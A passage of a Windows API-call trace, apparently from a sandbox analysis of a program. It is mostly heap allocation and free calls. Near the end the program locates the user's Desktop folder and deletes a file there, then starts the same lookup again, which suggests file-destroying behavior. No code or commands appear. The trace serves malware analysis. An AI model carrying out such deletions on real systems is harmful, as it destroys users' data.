hHeap=0x25c0000) returned 1 [0165.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0165.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.972] CloseHandle (hObject=0x1e8) returned 1 [0165.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0165.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0165.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.979] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0165.979] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.980] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c948 [0165.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GyHm6iovQDw.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyHm6iovQDw.m4a", lpFilePart=0x8bedfc*="GyHm6iovQDw.m4a") returned 0x35 [0165.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0165.981] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyHm6iovQDw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyhm6iovqdw.m4a")) returned 0x20 [0165.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyHm6iovQDw.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9c030, ftCreationTime.dwHighDateTime=0x1d4ccbb, ftLastAccessTime.dwLowDateTime=0x83648e20, ftLastAccessTime.dwHighDateTime=0x1d4cfe6, ftLastWriteTime.dwLowDateTime=0x83648e20, ftLastWriteTime.dwHighDateTime=0x1d4cfe6, nFileSizeHigh=0x0, nFileSizeLow=0x136a0, dwReserved0=0x51, dwReserved1=0x4, cFileName="GyHm6iovQDw.m4a", cAlternateFileName="GYHM6I~1.M4A")) returned 0xaa56a0 [0165.982] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GyHm6iovQDw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyhm6iovqdw.m4a")) returned 1 [0165.983] FindNextFileW (in: hFindFile=0xaa56a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9c030, ftCreationTime.dwHighDateTime=0x1d4ccbb, ftLastAccessTime.dwLowDateTime=0x83648e20, ftLastAccessTime.dwHighDateTime=0x1d4cfe6, ftLastWriteTime.dwLowDateTime=0x83648e20, ftLastWriteTime.dwHighDateTime=0x1d4cfe6, nFileSizeHigh=0x0, nFileSizeLow=0x136a0, dwReserved0=0x51, dwReserved1=0x4, cFileName="GyHm6iovQDw.m4a", cAlternateFileName="GYHM6I~1.M4A")) returned 0 [0165.983] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0165.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.983] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0165.984] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0165.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0165.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.985] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | 